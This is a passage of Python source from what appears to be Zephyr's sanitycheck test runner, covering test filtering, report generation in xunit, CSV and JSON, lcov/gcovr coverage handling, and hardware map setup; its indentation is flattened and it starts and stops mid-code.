elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
self.json_report(filename + ".json", append=only_failed, version=self.version)
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda inst: inst.platform.default, instance_list))
if self.integration:
instances += list(filter(lambda item: item.platform.name in tc.integration_platforms, \
instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default and \
not inst.platform.name in tc.integration_platforms, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch the next message from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.debug(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' elements can be added to 'properties',
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' elements can be added to 'properties',
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, platform=None, append=False, version="NA"):
rowdict = {}
results_dict = {}
rowdict["test_suite"] = []
results_dict["test_details"] = []
new_dict = {}
if platform:
selected = [platform]
else:
selected = self.selected_platforms
rowdict["test_environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
for p in selected:
json_dict = {}
inst = self.get_platform_instances(p)
if os.path.exists(filename) and append:
with open(filename, 'r') as report:
data = json.load(report)
for i in data["test_suite"]:
test_details = i["test_details"]
for test_data in test_details:
if not (test_data["status"]) == "failed":
new_dict = test_data
results_dict["test_details"].append(new_dict)
for _, instance in inst.items():
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
if os.path.exists(filename) and append:
json_dict = {"testcase": instance.testcase.name,
"arch": instance.platform.arch,
"type": instance.testcase.type,
"platform": p,
}
if instance.status in ["error", "failed", "timeout"]:
json_dict["status"] = "failed"
json_dict["reason"] = instance.reason
json_dict["execution_time"] = handler_time
if os.path.exists(handler_log):
json_dict["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
json_dict["device_log"] = self.process_log(device_log)
else:
json_dict["build_log"] = self.process_log(build_log)
results_dict["test_details"].append(json_dict)
else:
for k in instance.results.keys():
json_dict = {"testcase": k,
"arch": instance.platform.arch,
"type": instance.testcase.type,
"platform": p,
}
if instance.results[k] in ["PASS"]:
json_dict["status"] = "passed"
if instance.handler:
json_dict["execution_time"] = handler_time
if ram_size:
json_dict["ram_size"] = ram_size
if rom_size:
json_dict["rom_size"] = rom_size
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
json_dict["status"] = "failed"
json_dict["reason"] = instance.reason
json_dict["execution_time"] = handler_time
if os.path.exists(handler_log):
json_dict["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
json_dict["device_log"] = self.process_log(device_log)
else:
json_dict["build_log"] = self.process_log(build_log)
else:
json_dict["status"] = "skipped"
json_dict["reason"] = instance.reason
results_dict["test_details"].append(json_dict)
rowdict["test_suite"].append(results_dict)
with open(filename, "wt") as json_file:
json.dump(rowdict, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
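# For reference, a minimal sketch of the handler.log block that retrieve_gcov_data()
# expects (the file paths and hex bytes below are made-up examples):
#   GCOV_COVERAGE_DUMP_START
#   */path/to/build/foo.gcda<adcc0100...
#   */path/to/build/bar.gcda<00ff17a3...
#   GCOV_COVERAGE_DUMP_END
# Each "*" line is split on "<": the part before it (minus the leading "*") is a
# gcda file name and the part after it is a hex dump of that file's contents.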
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# gcovr fails if kobject_hash is present in the coverage data,
# so skip it (this is only a problem in gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, items):
# e.g. _interleave_list("-e", [a, b]) -> ["-e", a, "-e", b]
tuple_list = [(prefix, item) for item in items]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
